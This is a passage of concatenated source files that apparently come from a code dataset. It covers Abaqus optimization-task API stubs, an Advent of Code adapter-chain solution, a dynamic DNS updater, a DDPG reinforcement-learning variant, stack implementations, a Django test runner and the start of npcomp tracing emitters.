geometricRestrictionEvaluationFrequency,
growthScaleFactor, haltUponViolation,
layerReferenceRegion, meshSmoothingRegionMethod,
meshSmoothingStrategy, midsideInterpolation,
numFreeNodeLayers, numSmoothedElementLayers,
presumeFeasibleBCRegionAtStart, quadMaxAngle,
quadMinAngle, quadSkew, quadTaper, region,
reportPoorQualityElements, reportQualityViolation,
shrinkScaleFactor, smoothingRegion,
targetMeshQuality, tetAspectRatio, tetMaxAspect,
tetMinAspect, tetSkew, triMaxAngle, triMinAngle,
updateShapeBasisVectors, groupOperator)
return optimizationTask
def SizingTask(self, name: str, abaqusSensitivities: Boolean = True,
elementThicknessDeltaStopCriteria: float = 0,
freezeBoundaryConditionRegions: Boolean = OFF, freezeLoadRegions: Boolean = ON,
modeTrackingRegion: str = MODEL, numFulfilledStopCriteria: int = 2,
numTrackedModes: int = 5, objectiveFunctionDeltaStopCriteria: float = 0,
stopCriteriaDesignCycle: int = 4, thicknessMoveLimit: float = 0,
thicknessUpdateStrategy: SymbolicConstant = NORMAL, groupOperator: Boolean = OFF) -> SizingTask:
"""This method creates a SizingTask object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].SizingTask
Parameters
----------
name
A String specifying the optimization task repository key.
abaqusSensitivities
A Boolean specifying whether to use Abaqus to compute the design responses and their
sensitivities. The default value is True.
elementThicknessDeltaStopCriteria
A Float specifying the stop criteria based on the change in element thickness. The
            default value is 0.005.
freezeBoundaryConditionRegions
A Boolean specifying whether to exclude elements with boundary conditions from the
optimization. The default value is OFF.
freezeLoadRegions
A Boolean specifying whether to exclude elements with loads and elements with loaded
nodes from the optimization. The default value is ON.
modeTrackingRegion
            The SymbolicConstant MODEL or a Region object specifying the region to use for mode
tracking. The default value is MODEL.
numFulfilledStopCriteria
An Int specifying the number of stop criteria. The default value is 2.
numTrackedModes
An Int specifying the number of modes included in mode tracking. The default value is 5.
objectiveFunctionDeltaStopCriteria
A Float specifying the stop criteria based on the change in objective function. The
default value is 0.001.
stopCriteriaDesignCycle
An Int specifying the first design cycle used to evaluate convergence criteria. The
default value is 4.
thicknessMoveLimit
A Float specifying the maximum change in thickness per design cycle. The default value
is 0.25.
thicknessUpdateStrategy
A SymbolicConstant specifying the strategy for how the thickness is updated in the
method of moving asymptotes. Possible values are NORMAL, CONSERVATIVE, and AGGRESSIVE.
The default value is NORMAL.
groupOperator
A Boolean specifying whether the group in the design response will be evaluated using
the existing algorithm or a new algorithm based on Abaqus sensitivities. The default
value of False means that the existing algorithm will be used.
Returns
-------
A SizingTask object.
"""
self.optimizationTasks[name] = optimizationTask = SizingTask(name, abaqusSensitivities,
elementThicknessDeltaStopCriteria,
freezeBoundaryConditionRegions, freezeLoadRegions,
modeTrackingRegion, numFulfilledStopCriteria,
numTrackedModes,
objectiveFunctionDeltaStopCriteria,
stopCriteriaDesignCycle, thicknessMoveLimit,
thicknessUpdateStrategy, groupOperator)
return optimizationTask
def TopologyTask(self, name: str, abaqusSensitivities: Boolean = True,
algorithm: SymbolicConstant = GENERAL_OPTIMIZATION, densityMoveLimit: float = 0,
densityUpdateStrategy: SymbolicConstant = NORMAL,
elementDensityDeltaStopCriteria: float = 0, filterRadius: float = None,
firstCycleDeletedVolume: float = 5,
firstCycleDeletedVolumeTechnique: SymbolicConstant = OFF,
freezeBoundaryConditionRegions: Boolean = OFF, freezeLoadRegions: Boolean = ON,
frequencySpectrumWeight: float = 6, initialDensity: SymbolicConstant = DEFAULT,
materialInterpolationPenalty: float = 3,
materialInterpolationTechnique: SymbolicConstant = DEFAULT, maxDensity: float = 1,
minDensity: float = None, modeTrackingRegion: SymbolicConstant = MODEL,
numDesignCycles: int = 15, numFulfilledStopCriteria: int = 2, numTrackedModes: int = 5,
objectiveFunctionDeltaStopCriteria: float = None, region: SymbolicConstant = MODEL,
softDeletionMethod: SymbolicConstant = STANDARD, softDeletionRadius: float = 0,
softDeletionRegion: str = None, softDeletionThreshold: float = None,
stepSize: SymbolicConstant = MEDIUM,
stiffnessMassDamping: typing.Union[SymbolicConstant, float] = AVERAGE_EDGE_LENGTH,
stopCriteriaDesignCycle: int = 4, structuralMassDamping: float = None,
viscousMassDamping: float = None, viscousStiffnessDamping: float = None,
groupOperator: Boolean = OFF) -> TopologyTask:
"""This method creates a TopologyTask object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].TopologyTask
Parameters
----------
name
A String specifying the optimization task repository key.
abaqusSensitivities
A Boolean specifying whether to use Abaqus to compute the design responses and their
sensitivities. The default value is True.
algorithm
A SymbolicConstant specifying the optimization task algorithm. Possible values are
GENERAL_OPTIMIZATION and CONDITION_BASED_OPTIMIZATION. The default value is
GENERAL_OPTIMIZATION.
densityMoveLimit
A Float specifying the maximum density change per design cycle. The default value is
0.25.
densityUpdateStrategy
A SymbolicConstant specifying the strategy for how the densities are updated in the
method of moving asymptotes. Possible values are NORMAL, CONSERVATIVE, and AGGRESSIVE.
The default value is NORMAL.
elementDensityDeltaStopCriteria
A Float specifying the stop criteria based upon the change in element densities. The
            default value is 0.005.
filterRadius
None or a Float specifying the mesh filter radius for mesh independence and minimum
size. The default value is None.
firstCycleDeletedVolume
A Float specifying the volume that can be removed immediately in the first design cycle.
The default value is 5.0.
firstCycleDeletedVolumeTechnique
A SymbolicConstant specifying the method of quantifying volume that can be removed
immediately in the first design cycle. Possible values are OFF, PERCENTAGE, and
ABSOLUTE. The default value is OFF.
freezeBoundaryConditionRegions
A Boolean specifying whether to exclude elements with boundary conditions from the
optimization. The default value is OFF.
freezeLoadRegions
A Boolean specifying whether to exclude elements with loads and elements with loaded
nodes from the optimization. The default value is ON.
frequencySpectrumWeight
A Float specifying the weighting factor for frequency spectrum peaks. The default value
is 6.0.
initialDensity
A SymbolicConstant specifying the Optimization product default or a float specifying the
initial density. The default value is DEFAULT.
materialInterpolationPenalty
A Float specifying the penalty factor for the material interpolation technique. The
default value is 3.0.
materialInterpolationTechnique
A SymbolicConstant specifying the material interpolation technique: optimization product
default, solid isotropic material with penalization, or rational approximation of
material properties. Possible values are DEFAULT, SIMP, and RAMP. The default value is
DEFAULT.
maxDensity
A Float specifying the maximum density in the density update. The default value is 1.0.
minDensity
            A Float specifying the minimum density in the density update. The default value is 0.001.
modeTrackingRegion
The SymbolicConstant MODEL or a Region object specifying the region to use for mode
tracking. The default value is MODEL.
numDesignCycles
An Int specifying the number of design cycles permitted when *stepSize* is DYNAMIC. The
default value is 15.
numFulfilledStopCriteria
An Int specifying the number of stop criteria. The default value is 2.
numTrackedModes
An Int specifying the number of modes included in mode tracking. The default value is 5.
objectiveFunctionDeltaStopCriteria
A Float specifying the stop criteria based on the change in objective function. The
            default value is 0.001.
region
The SymbolicConstant MODEL or a Region object specifying the region to which the
optimization task is applied. The default value is MODEL.
softDeletionMethod
A SymbolicConstant specifying the method used when *softDeletionRegion* is specified.
The STANDARD method avoids creating disconnected regions. The AGGRESSIVE method only
considers the *softDeletionThreshold*. The MAX_SHEAR_STRAIN, MAX_ELASTOPLASTIC_STRAIN
and VOLUME_COMPRESSION methods do not need the *softDeletionRadius*. Possible values are
STANDARD, AGGRESSIVE, MAX_SHEAR_STRAIN, MIN_PRINCIPAL_STRAIN, MAX_ELASTOPLASTIC_STRAIN
and VOLUME_COMPRESSION. The default value is STANDARD.
softDeletionRadius
A Float specifying the radius to use when considering neighboring soft elements to
delete. The default value is 0.0.
softDeletionRegion
None or a Region object specifying the region in which the soft elements should be
deleted during optimization. The default value is None.
softDeletionThreshold
A Float specifying the relative material density value used to identify soft elements.
Those with values below the threshold are considered for removal. For STANDARD and
AGGRESSIVE methods positive values are accepted and the default value is 0.05. For
MAX_SHEAR_STRAIN and MAX_ELASTOPLASTIC_STRAIN methods positive values are accepted
whereas for MIN_PRINCIPAL_STRAIN and VOLUME_COMPRESSION methods negative values are
accepted.
stepSize
A SymbolicConstant specifying the size of the increment for volume modification.
Possible values are DYNAMIC, VERY_SMALL, SMALL, MODERATE, MEDIUM, and LARGE. The default
value is MEDIUM.
stiffnessMassDamping
The SymbolicConstant AVERAGE_EDGE_LENGTH or a Float specifying the stiffness mass
damping for the task region. The default value is AVERAGE_EDGE_LENGTH.
stopCriteriaDesignCycle
An Int specifying the first design cycle used to evaluate convergence criteria. The
default value is 4.
structuralMassDamping
None or a Float specifying the structural mass damping for the task region. The default
value is None.
viscousMassDamping
None or a Float specifying the viscous mass damping for the task region. The default
value is None.
viscousStiffnessDamping
None or a Float specifying the viscous stiffness damping for the task region. The
default value is None.
groupOperator
A Boolean specifying whether the group in the design response will be evaluated using
the existing algorithm or a new algorithm based on Abaqus sensitivities. The default
value of False means that the existing algorithm will be used.
Returns
-------
A TopologyTask object.
"""
self.optimizationTasks[name] = optimizationTask = TopologyTask(name, abaqusSensitivities, algorithm,
densityMoveLimit, densityUpdateStrategy,
elementDensityDeltaStopCriteria, filterRadius,
firstCycleDeletedVolume,
firstCycleDeletedVolumeTechnique,
freezeBoundaryConditionRegions,
freezeLoadRegions, frequencySpectrumWeight,
initialDensity, materialInterpolationPenalty,
materialInterpolationTechnique, maxDensity,
minDensity, modeTrackingRegion, numDesignCycles,
numFulfilledStopCriteria, numTrackedModes,
objectiveFunctionDeltaStopCriteria, region,
softDeletionMethod, softDeletionRadius,
softDeletionRegion, softDeletionThreshold,
stepSize, stiffnessMassDamping,
stopCriteriaDesignCycle, structuralMassDamping,
viscousMassDamping, viscousStiffnessDamping,
groupOperator)
return optimizationTask
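
    # Hypothetical usage; ShapeTask and SizingTask are created the same way:
    #     mdb.models['Model-1'].TopologyTask(name='Topology-Task-1')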
| StarcoderdataPython |
4801130 | # vi: set shiftwidth=4 tabstop=4 expandtab:
import datetime
import collections
import itertools
def get_adapters_from_file(file_path="../../resources/year2020_day10_input.txt"):
with open(file_path) as f:
return [int(l) for l in f]
def get_jolt_differences(adapters):
adapters = [0] + sorted(adapters) + [max(adapters) + 3]
return collections.Counter(ad2 - ad1 for ad1, ad2 in zip(adapters, adapters[1:]))
def get_nb_charging_arrangements(adapters):
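    # Dynamic programming over the sorted adapter chain: nb_arr[i] counts the distinct ways
    # to reach adapter i from the outlet (jolt 0). Each adapter is reachable from any of the
    # up-to-3 preceding adapters whose joltage is within 3 of it, so nb_arr[i] is the sum of
    # those counts, and the last entry is the total number of arrangements.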
adapters = [0] + sorted(adapters)
nb_arr = []
for i, ad in enumerate(adapters):
nb = 0 if i else 1
for idx in range(max(0, i - 3), i):
if adapters[idx] + 3 >= ad:
nb += nb_arr[idx]
nb_arr.append(nb)
return nb_arr[-1]
def run_tests():
example1 = [16, 10, 15, 5, 1, 11, 7, 19, 6, 12, 4]
example2 = [
28,
33,
18,
42,
31,
14,
46,
20,
48,
47,
24,
23,
49,
45,
19,
38,
39,
11,
1,
32,
25,
35,
8,
17,
7,
9,
4,
2,
34,
10,
3,
]
jolt_diff = get_jolt_differences(example1)
assert jolt_diff[1] * jolt_diff[3] == 35
jolt_diff = get_jolt_differences(example2)
assert jolt_diff[1] * jolt_diff[3] == 220
assert get_nb_charging_arrangements(example1) == 8
assert get_nb_charging_arrangements(example2) == 19208
def get_solutions():
adapters = get_adapters_from_file()
jolt_diff = get_jolt_differences(adapters)
print(jolt_diff[1] * jolt_diff[3] == 1656)
print(get_nb_charging_arrangements(adapters) == 56693912375296)
if __name__ == "__main__":
begin = datetime.datetime.now()
run_tests()
get_solutions()
end = datetime.datetime.now()
print(end - begin)
| StarcoderdataPython |
3287463 | import sys
import requests
import time
def update_record(username, password):
url = 'http://' + username + ':' + password + '@dyn.dns.he.net/nic/update?hostname=' + username
try:
r = requests.get(url)
print(r.status_code)
except requests.RequestException as e:
print(e)
if __name__ == '__main__':
your_domain = str(sys.argv[1])
your_domain_key = str(sys.argv[2])
while True:
update_record(your_domain, your_domain_key)
time.sleep(600)
| StarcoderdataPython |
8119 | import numpy as np
import torch
from torch.nn import functional as F
from rltoolkit.acm.off_policy import AcMOffPolicy
from rltoolkit.algorithms import DDPG
from rltoolkit.algorithms.ddpg.models import Actor, Critic
class DDPG_AcM(AcMOffPolicy, DDPG):
def __init__(
self, unbiased_update: bool = False, custom_loss: float = 0.0,
custom_loss_target: float = 0.0, custom_loss_lr: float = 0.0001,
refill_buffer: bool = False,
lagrangian_custom_loss: bool = False, separate_custom_loss: bool = False,
cw_cl_targets: list = None, custom_loss_target_decay: int = None,
custom_loss_target_dfactor: float = None,
*args, **kwargs,
):
f"""DDPG with AcM class
Args:
unbiased_update (bool, optional): Use next_obs as action for update.
Defaults to { False }.
refill_buffer (bool, optional): if buffer should be refilled with new observations, when its full
Defaults to {False}
"""
super().__init__(*args, **kwargs)
self.unbiased_update = unbiased_update
self.actor = Actor(
self.ob_dim, ac_lim=self.actor_ac_lim, ac_dim=self.actor_output_dim
)
if not self.acm_critic:
self.critic = Critic(self.ob_dim, ac_dim=self.actor_output_dim)
self.custom_loss = custom_loss
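        # Inverse softplus: softplus(x) = log(1 + exp(x)), so seeding the raw parameter with
        # log(exp(y) - 1) makes F.softplus(custom_loss_param) equal custom_loss initially.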
custom_loss_scaled = np.log(np.exp(custom_loss) - 1)
self.custom_loss_param = torch.tensor(custom_loss_scaled) if not separate_custom_loss else torch.Tensor([custom_loss_scaled] * self.actor_output_dim)
self.custom_loss_param.requires_grad = lagrangian_custom_loss
self.custom_loss_target = custom_loss_target
self.cw_cl_targets = cw_cl_targets
if lagrangian_custom_loss and cw_cl_targets:
self.custom_loss_target = cw_cl_targets
self.lagrangian_custom_loss = lagrangian_custom_loss
self.custom_loss_lr = custom_loss_lr
self.separate_custom_loss = separate_custom_loss
self.custom_loss_optimizer = self.opt([self.custom_loss_param], lr=custom_loss_lr)
self.refill_buffer = refill_buffer
self.custom_loss_target_decay = custom_loss_target_decay
self.custom_loss_target_dfactor = custom_loss_target_dfactor
if self.custom_loss:
self.loss["ddpg"] = 0.0
self.loss["dist"] = 0.0
if lagrangian_custom_loss:
if self.separate_custom_loss:
self.distances = []
for i in range(self.actor_output_dim):
self.loss[f"custom_loss_param/{i}"] = 0.0
else:
self.loss["custom_loss_param"] = 0.0
new_hparams = {
"hparams/unbiased_update": self.unbiased_update,
"hparams/custom_loss": self.custom_loss,
"hparams/lagrangian_cl": self.lagrangian_custom_loss,
"hparams/custom_loss_target_decay": self.custom_loss_target_decay,
"hparams/custom_loss_target_dfactor": self.custom_loss_target_dfactor,
}
if self.lagrangian_custom_loss:
if self.cw_cl_targets is None:
new_hparams["hparams/cl_target"] = self.custom_loss_target
new_hparams["hparams/cl_lr"] = self.custom_loss_lr
self.hparams_acm.update(new_hparams)
self.hparams.update(self.hparams_acm)
def noise_action(self, obs, act_noise, deterministic=False):
action, _ = self._actor.act(obs, deterministic)
noise = act_noise * torch.randn(self.actor_output_dim, device=self.device)
action += noise * self.actor_ac_lim
action = np.clip(
action.cpu(), -1.1 * self.actor_ac_lim.cpu(), 1.1 * self.actor_ac_lim.cpu()
)
action = action.to(self.device)
if self.denormalize_actor_out:
action = self.replay_buffer.denormalize(action, self.acm_ob_idx)
return action
def custom_loss_target_decay_condition(self):
return(
self.custom_loss_target_decay is not None
and self.custom_loss_target_dfactor is not None
and self.iterations > 0
and self.stats_logger.frames % self.custom_loss_target_decay == 0
)
def acm_update_condition(self):
return (
self.iteration > 0
and self.acm_epochs > 0
and self.stats_logger.frames % self.acm_update_freq == 0
)
def make_unbiased_update(self):
if self.update_condition():
for _ in range(self.grad_steps):
batch = self.replay_buffer.sample_batch(
self.update_batch_size, self.device
)
obs, next_obs, _, reward, done, acm_action = batch
self.update(
obs=obs,
next_obs=next_obs,
action=next_obs,
reward=reward,
done=done,
acm_action=acm_action,
)
def make_update(self):
if self.unbiased_update:
self.make_unbiased_update()
else:
super().make_update()
if self.custom_loss_target_decay_condition():
self.custom_loss_target *= self.custom_loss_target_dfactor
print(f"CUSTOM LOSS TARTGET DECAY, CURRENT VALUE {self.custom_loss_target}")
if self.acm_update_condition():
if self.acm_update_batches:
self.update_acm_batches(self.acm_update_batches)
else:
self.update_acm(self.acm_epochs)
def collect_params_dict(self):
params_dict = super().collect_params_dict()
params_dict["acm"] = self.acm.state_dict()
return params_dict
def apply_params_dict(self, params_dict):
super().apply_params_dict(params_dict)
self.acm.load_state_dict(params_dict["acm"])
def save_model(self, save_path=None):
save_path = DDPG.save_model(self, save_path)
torch.save(self.acm.state_dict(), save_path + "_acm_model.pt")
def compute_qfunc_targ(
self, reward: torch.Tensor, next_obs: torch.Tensor, done: torch.Tensor
):
"""Compute targets for Q-functions
Args:
reward (torch.Tensor): batch of rewards
next_obs (torch.Tensor): batch of next observations
done (torch.Tensor): batch of done
Returns:
torch.Tensor: Q-function targets for the batch
"""
with torch.no_grad():
next_action, _ = self.actor_targ(next_obs)
next_action = self.replay_buffer.denormalize(next_action, self.acm_ob_idx)
if self.acm_critic:
acm_obs = torch.cat([next_obs, next_action], axis=1)
next_action = self.acm(acm_obs)
q_target = self.critic_targ(next_obs, next_action)
qfunc_target = reward + self.gamma * (1 - done) * q_target
return qfunc_target
def add_custom_loss(self, loss, action, denorm_action, next_obs):
if self.custom_loss:
self.loss["ddpg"] = loss.item()
if self.norm_closs:
next_obs = self.replay_buffer.normalize(next_obs, force=True)
else:
action = denorm_action
if not self.separate_custom_loss:
loss_dist = F.mse_loss(action, self.cut_obs(next_obs))
self.loss["dist"] = loss_dist.item()
if self.lagrangian_custom_loss:
loss += F.softplus(self.custom_loss_param) * (loss_dist - self.custom_loss_target)
else:
loss += self.custom_loss * loss_dist
if self.custom_loss_target_decay is not None:
self.loss["custom_loss_target"] = self.custom_loss_target
else:
distances = torch.mean(F.mse_loss(action, self.cut_obs(next_obs), reduction='none'), dim=0)
if self.cw_cl_targets is None:
loss += torch.sum(F.softplus(self.custom_loss_param) * (distances - self.custom_loss_target))
else:
loss += torch.sum(F.softplus(self.custom_loss_param) * (distances - torch.Tensor(self.custom_loss_target)))
self.loss["dist"] = distances.detach()
if self.debug_mode:
for j in range(distances.shape[0]):
self.loss[f"dist/cw/{j}"] = distances[j]
return loss
def compute_pi_loss(self, obs, next_obs):
action, _ = self._actor(obs)
denorm_action = self.replay_buffer.denormalize(action, self.acm_ob_idx)
if self.acm_critic:
acm_obs = torch.cat([obs, denorm_action], axis=1)
critic_action = self.acm(acm_obs)
else:
critic_action = denorm_action
loss = -self._critic(obs, critic_action).mean()
return self.add_custom_loss(loss, action, denorm_action, next_obs)
def update_custom_loss_param_loss(self):
if not self.lagrangian_custom_loss:
return
dist_loss = self.loss["dist"]
if self.cw_cl_targets is None:
loss = -F.softplus(self.custom_loss_param) * (dist_loss - self.custom_loss_target)
else:
loss = -F.softplus(self.custom_loss_param) * (dist_loss - torch.Tensor(self.custom_loss_target))
if self.separate_custom_loss:
for i in range(len(loss)):
self.loss[f"custom_loss_param/{i}"] = loss[i].item()
self.loss["dist"] = torch.mean(self.loss["dist"]).item()
loss = torch.sum(loss)
else:
self.loss["custom_loss_param"] = loss.item()
self.custom_loss_optimizer.zero_grad()
loss.backward()
self.custom_loss_optimizer.step()
def copy_offline_dataset(self, dataset, size):
"""copies the provided offlineRL dataset into the replay buffer.
for the moment assumes D4RL dataset format (a dictionary)
and copies elements one-by-one
"""
i = 0
traj = 0
while i < size:
traj += 1
done = torch.tensor(dataset['timeouts'][i] or dataset['terminals'][i])
obs = torch.tensor(dataset['observations'][i])
prev_idx = self.replay_buffer.add_obs(obs)
i += 1
ep_len = 0
while(not done and i < size):
nextobs = torch.tensor(dataset['observations'][i])
rew = torch.tensor( dataset['rewards'][i] )
done = torch.tensor( dataset['timeouts'][i] or dataset['terminals'][i] )
action = torch.tensor( dataset['actions'][i] )
end = torch.tensor( dataset['terminals'][i] )
next_idx = self.replay_buffer.add_obs(nextobs)
self.replay_buffer.add_timestep(
prev_idx, next_idx, nextobs, rew, done, end
)
self.replay_buffer.add_acm_action(action)
prev_idx = next_idx
i += 1
ep_len += 1
print(f"copied offline dataset with {i} samples, contains {traj} trajectories")
#sets the internal variables according to the provided offline dataset
self.acm_pre_train_samples = i
self.buffer_size = i
self.max_frames = i
self.iterations = i / self.steps_per_epoch
#updates std/dev/min/max parameters of the dataset
self.update_obs_mean_std(self.replay_buffer)
def collect_batch_and_train(self, steps_per_epoch: int, *args, **kwargs):
"""SPP variant of rollouts and collect samples if there is enough samples
in replay buffer use existing samples to perform actor/critic update
otherwise generate new samples till steps_per_epoch number of steps
will be added to the replay buffer
Args:
steps_per_epoch (int): number of samples to collect and train
*args, **kwargs: arguments for make_update
"""
collected = 0
while collected < steps_per_epoch:
            # Important: once the replay buffer is filled, stop generating new frames and just
            # reuse the existing buffer, so that the amount of experience used for learning is
            # counted correctly.
if (self.stats_logger.frames >= self.buffer_size - self.acm_pre_train_samples) and not self.refill_buffer:
self.stats_logger.frames += 1
collected += 1
self.make_update(*args, **kwargs)
continue
self.stats_logger.rollouts += 1
obs = self.env.reset()
# end - end of the episode from perspective of the simulation
# done - end of the episode from perspective of the model
end = False
obs = self.process_obs(obs)
prev_idx = self.replay_buffer.add_obs(obs)
ep_len = 0
while not end:
obs = self.replay_buffer.normalize(obs)
if (self.stats_logger.frames > self.acm_pre_train_samples) and (self.stats_logger.frames <= self.acm_pre_train_samples + self.random_frames):
action = self.initial_act(obs)
else:
action = self.noise_action(obs, self.act_noise)
action_proc = self.process_action(action, obs)
prev_obs = obs
obs, rew, done, _ = self.env.step(action_proc)
ep_len += 1
end = True if ep_len == self.max_ep_len else done
done = False if ep_len == self.max_ep_len else done
obs = self.process_obs(obs)
if self.next_obs_diff is not None:
obs = self.compute_next_obs_diff(prev_obs, obs)
next_idx = self.replay_buffer.add_obs(obs)
self.replay_buffer.add_timestep(
prev_idx, next_idx, action, rew, done, end
)
prev_idx = next_idx
self.stats_logger.frames += 1
collected += 1
self.make_update(*args, **kwargs)
def update(
self,
obs: torch.Tensor,
next_obs: torch.Tensor,
action: torch.Tensor,
reward: torch.Tensor,
done: torch.Tensor,
acm_action: torch.Tensor,
):
"""DDPG update step
Args:
obs (torch.Tensor): observations tensor
next_obs (torch.Tensor): next observations tensor
action (torch.Tensor): actions tensor
reward (torch.Tensor): rewards tensor
done (torch.Tensor): dones tensor
acm_action (torch.Tensor): tensor of acm actions
"""
for param in self.acm.parameters():
param.requires_grad = False
if self.acm_critic:
action = acm_action
y = self.compute_qfunc_targ(reward, next_obs, done)
# Update Q-function by one step
y_q = self._critic(obs, action)
loss_q = F.mse_loss(y_q, y)
self.loss["critic"] = loss_q.item()
self.critic_optimizer.zero_grad()
loss_q.backward()
self.critic_optimizer.step()
# Update policy by one step
self._critic.eval()
loss = self.compute_pi_loss(obs, next_obs)
self.loss["actor"] = loss.item()
self.actor_optimizer.zero_grad()
loss.backward()
self.actor_optimizer.step()
        # update the temperature of the Lagrangian optimization objective
self.update_custom_loss_param_loss()
# Update target networks
self.update_target_nets()
self._critic.train()
for param in self.acm.parameters():
param.requires_grad = True
def add_tensorboard_logs(self, buffer, done):
super().add_tensorboard_logs(buffer, done)
if self.lagrangian_custom_loss:
self.tensorboard_writer.log_custom_loss_param(
self.iteration, self.custom_loss_param)
if __name__ == "__main__":
#with torch.cuda.device(0):
model = DDPG_AcM(
# unbiased_update=True,
# custom_loss=True,
# acm_update_batches=50,
# denormalize_actor_out=True,
env_name="Pendulum-v0",
buffer_size=50000,
act_noise=0.05,
iterations=100,
gamma=0.99,
steps_per_epoch=200,
stats_freq=5,
test_episodes=3,
custom_loss=1,
lagrangian_custom_loss=False,
# tensorboard_dir="logs_ddpg",
# tensorboard_comment="",
acm_update_freq=200,
acm_epochs=1,
acm_pre_train_epochs=10,
acm_pre_train_samples=10000,
use_gpu=False,
render=False,
)
model.pre_train()
model.train()
| StarcoderdataPython |
3256503 | #!python
from linkedlist import LinkedList
# Implement LinkedStack below, then change the assignment at the bottom
# to use this Stack implementation to verify it passes all tests
class LinkedStack(object):
def __init__(self, iterable=None):
"""Initialize this stack and push the given items, if any."""
# Initialize a new linked list to store the items
self.list = LinkedList()
if iterable is not None:
for item in iterable:
self.push(item)
def __repr__(self):
"""Return a string representation of this stack."""
return 'Stack({} items, top={})'.format(self.length(), self.peek())
def is_empty(self):
"""Return True if this stack is empty, or False otherwise."""
return False if self.list.head else True
def length(self):
"""Return the number of items in this stack."""
return self.list.size
def push(self, item):
"""Insert the given item on the top of this stack.
        Running time: O(1) because adding an item to the
front of a linked list is just changing pointers
which takes O(1) time"""
self.list.prepend(item)
def peek(self):
"""Return the item on the top of this stack without removing it,
or None if this stack is empty."""
return self.list.head.data if self.list.head else None
def pop(self):
"""Remove and return the item on the top of this stack,
or raise ValueError if this stack is empty.
        Running time: O(1) because removing an item from the front
of a linked list is just changing pointers which
takes O(1) time"""
if self.is_empty():
raise ValueError('Stack is empty')
item = self.list.head.data
self.list.delete(item)
return item
# Implement ArrayStack below, then change the assignment at the bottom
# to use this Stack implementation to verify it passes all tests
class ArrayStack(object):
def __init__(self, iterable=None):
"""Initialize this stack and push the given items, if any."""
# Initialize a new list (dynamic array) to store the items
self.list = list()
if iterable is not None:
for item in iterable:
self.push(item)
def __repr__(self):
"""Return a string representation of this stack."""
return 'Stack({} items, top={})'.format(self.length(), self.peek())
def is_empty(self):
"""Return True if this stack is empty, or False otherwise."""
        return len(self.list) == 0
def length(self):
"""Return the number of items in this stack."""
return len(self.list)
def push(self, item):
"""Insert the given item on the top of this stack.
        Running time: O(1) amortized, because appending to a list
        (dynamic array) is setting a pointer to a new value
        (except when we need to resize the underlying array), which
        takes O(1) time on average"""
self.list.append(item)
def peek(self):
"""Return the item on the top of this stack without removing it,
or None if this stack is empty."""
return self.list[len(self.list)-1] if len(self.list) > 0 else None
def pop(self):
"""Remove and return the item on the top of this stack,
or raise ValueError if this stack is empty.
        Running time: O(1) because the built-in list pop method
        removes the last item in the list, and since Python lists
        are dynamic arrays with O(1) indexing, it takes O(1) time to
        remove the last item"""
if self.is_empty():
raise ValueError('Stack is empty')
return self.list.pop()
# Implement LinkedStack and ArrayStack above, then change the assignment below
# to use each of your Stack implementations to verify they each pass all tests
Stack = LinkedStack
# Stack = ArrayStack
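
if __name__ == '__main__':
    # Minimal sanity-check sketch (assumes the companion linkedlist module is importable);
    # exercises whichever implementation Stack is bound to above.
    s = Stack([1, 2, 3])
    assert s.peek() == 3
    assert s.pop() == 3
    assert s.length() == 2
    print(s)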
| StarcoderdataPython |
4818592 | # -*- coding: utf-8 -*-
import os, sys
from django.conf import settings
from django.core.management import call_command
DIRNAME = os.path.dirname(__file__)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(DIRNAME, 'database.db'),
}
}
settings.configure(DEBUG = True,
DATABASES=DATABASES,
USE_TZ=True,
SNOWSHOESTAMP_KEY='12345678910111213141516171819201234567891011121314151617181920',
SNOWSHOESTAMP_SECRET='bananamonkeygorillachimp',
ROOT_URLCONF='snowshoestamp.urls',
PASSWORD_HASHERS=('django.contrib.auth.hashers.MD5PasswordHasher',), # simple fast hasher but not secure
INSTALLED_APPS = ('django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'snowshoestamp',))
from django.test.simple import DjangoTestSuiteRunner
call_command('syncdb', interactive=False)
failures = DjangoTestSuiteRunner().run_tests(['snowshoestamp',], verbosity=1)
if failures:
sys.exit(failures) | StarcoderdataPython |
35474 | <reponame>joepatmckenna/normal_forms
from normal_forms import normal_form
import sympy
# Murdock, Normal Forms and Unfoldings of Local Dynamical Systems, Example 4.5.24
def f(x, y, z):
f1 = 6 * x + x**2 + x * y + x * z + y**2 + y * z + z**2
f2 = 2 * y + x**2 + x * y + x * z + y**2 + y * z + z**2
f3 = 3 * z + x**2 + x * y + x * z + y**2 + y * z + z**2
return f1, f2, f3
h = normal_form(f, (0, 0, 0), 2)
# coeff of z**2
print h.fun[0].coeff(h.jet.var[2]**2)
| StarcoderdataPython |
1687068 | <filename>python/npcomp/tracing/emitters.py
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
import numpy as np
from collections import namedtuple
from enum import Enum
class Protocol(Enum):
UFUNC = 1
ARRAY_FUNC = 2
class TraceValueType(Enum):
NDARRAY = 1
class TraceValue(
namedtuple("TraceValue", ["value", "type"],
defaults=(TraceValueType.NDARRAY,))):
__slots__ = ()
"""A Python value and the trace type that it should correspond to."""
class TraceInvocation(
namedtuple("TraceInvocation", ["inputs", "kwargs", "protocol", "method"],
defaults=(Protocol.ARRAY_FUNC, "__call__"))):
"""An invocation of a single functions.
This abstracts over both ufuncs and array_funcs, differentiating by the
protocol and method.
"""
__slots__ = ()
class EmissionRequest(
namedtuple("EmissionRequest",
["input_ssa_values", "dialect_helper", "extra"],
defaults=(None,))):
"""Represents the result of processing inputs from an invocation.
The `input_ssa_values` are mlir.ir.Value instances corresponding to
input_trace_values in TraceValueMap.
The `extra` value is only relevant to the producer and can be used as a
blackbox mechanism to transfer un-tracked state from an invocation to
emission.
The `dialect_helper` fields correspond to mlir.ir.DialectHelper.
"""
__slots__ = ()
class TraceValueMap(
namedtuple("TraceValueMap",
["input_trace_values", "result_trace_value_types", "extra"],
defaults=(None,))):
"""The result of mapping an invocation to corresponding op structure.
This type associates:
- Python (object, TraceValueType) representing invocation inputs that
correspond to SSA values in the IR.
- TraceValueTypes that are the expected logical result types from the
invocation.
- 'extra' object that is passed to followon Emitter methods.
"""
__slots__ = ()
class FuncEmitter:
"""An emitter for an op-like function invocation."""
def map_invocation(self, trace_invocation: TraceInvocation) -> TraceValueMap:
"""Maps from an invocation to EmissionRequest.
This hook is also responsible for validating the invocation and should
